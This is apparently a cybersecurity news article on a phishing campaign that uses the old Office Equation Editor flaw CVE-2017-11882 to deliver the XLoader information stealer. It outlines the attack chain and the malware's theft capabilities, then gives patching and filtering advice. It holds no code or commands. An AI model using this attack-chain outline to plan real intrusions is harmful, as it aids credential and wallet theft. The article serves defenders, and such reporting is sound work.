In a recent wave of cyberattacks, threat actors have been exploiting a longstanding vulnerability in Microsoft Office’s Equation Editor to distribute the XLoader malware. This campaign underscores the persistent risks associated with unpatched software and the evolving tactics of cybercriminals.
Exploitation of CVE-2017-11882
The vulnerability in question, CVE-2017-11882, is a memory corruption flaw within Microsoft Office’s Equation Editor component. Originally patched in 2017, this vulnerability allows attackers to execute arbitrary code on a victim’s machine when a specially crafted document is opened. Despite the availability of a patch, many systems remain unprotected, providing an avenue for exploitation.
Phishing Campaign Details
Attackers initiate their scheme by sending phishing emails that masquerade as purchase or order confirmations. These emails contain DOCX attachments that, when opened, trigger the embedded malicious RTF files exploiting the CVE-2017-11882 vulnerability. This method effectively bypasses traditional security measures, as the malicious code is concealed within seemingly benign documents.
Technical Breakdown of the Attack Chain
1. Email Delivery: The victim receives a phishing email with a DOCX attachment, purportedly related to a legitimate transaction.
2. Document Execution: Upon opening the DOCX file, it establishes an external connection to execute the embedded RTF document.
3. Vulnerability Exploitation: The RTF file exploits the Equation Editor vulnerability, leading to the creation and execution of a Client.vbe file in the system’s temporary folder.
4. Malware Deployment: The Client.vbe file utilizes PowerShell commands to inject the XLoader malware directly into the system’s memory, effectively evading detection by traditional antivirus solutions.
Role of HorusProtector
A notable aspect of this campaign is the use of HorusProtector, a commercial malware protection and distribution tool. Since its initial detection in 2024, HorusProtector has evolved, now embedding entire malware payloads directly into VBE files. This advancement increases the file size significantly, from approximately 10KB to 1.34MB, enhancing the stealth and efficacy of the malware delivery process.
XLoader Malware Capabilities
XLoader, the final payload in this attack chain, is a sophisticated information stealer that has evolved from the FormBook malware family. It is available as Malware-as-a-Service on underground forums and targets both Windows and macOS systems. Once installed, XLoader can:
– Record Keystrokes and Capture Screenshots: Monitoring user activity to gather sensitive information.
– Steal Clipboard Data: Including cryptocurrency transactions, posing a significant risk to users involved in digital currency exchanges.
– Extract Credentials: From web browsers, email clients, and messaging applications, facilitating unauthorized access to various accounts.
– Harvest Cryptocurrency Wallet Information: Enabling attackers to siphon funds directly from victims’ wallets.
– Download Additional Malware Payloads: Allowing for further compromise of the infected system.
Persistent Threat of Legacy Vulnerabilities
The continued exploitation of CVE-2017-11882 highlights a critical issue in cybersecurity: the enduring threat posed by unpatched vulnerabilities. Despite being identified and patched years ago, this flaw remains a favored target for cybercriminals due to the prevalence of unupdated systems. This situation is exacerbated by the fact that the Equation Editor component, being an out-of-process COM server, can bypass certain security measures, making it an attractive vector for attacks.
Recommendations for Mitigation
To protect against such exploits, it is imperative for organizations and individuals to adopt comprehensive security measures:
1. Apply Security Patches Promptly: Ensure that all Microsoft Office installations are updated with the latest security patches to close known vulnerabilities.
2. Implement Email Filtering Solutions: Deploy advanced email filtering to detect and block phishing attempts and malicious attachments.
3. Disable Unnecessary Components: If the Equation Editor is not required, consider disabling it to reduce the attack surface.
4. User Education: Conduct regular training sessions to educate users about the risks of opening unsolicited email attachments and the importance of verifying the authenticity of such communications.
5. Enable Advanced Security Features: Utilize security tools like Windows Defender Exploit Guard to add an extra layer of protection against exploits.
Conclusion
The exploitation of the CVE-2017-11882 vulnerability to deploy XLoader malware serves as a stark reminder of the importance of maintaining up-to-date software and implementing robust security practices. Cybercriminals continue to leverage old vulnerabilities to execute sophisticated attacks, making it crucial for users to remain vigilant and proactive in their cybersecurity efforts.
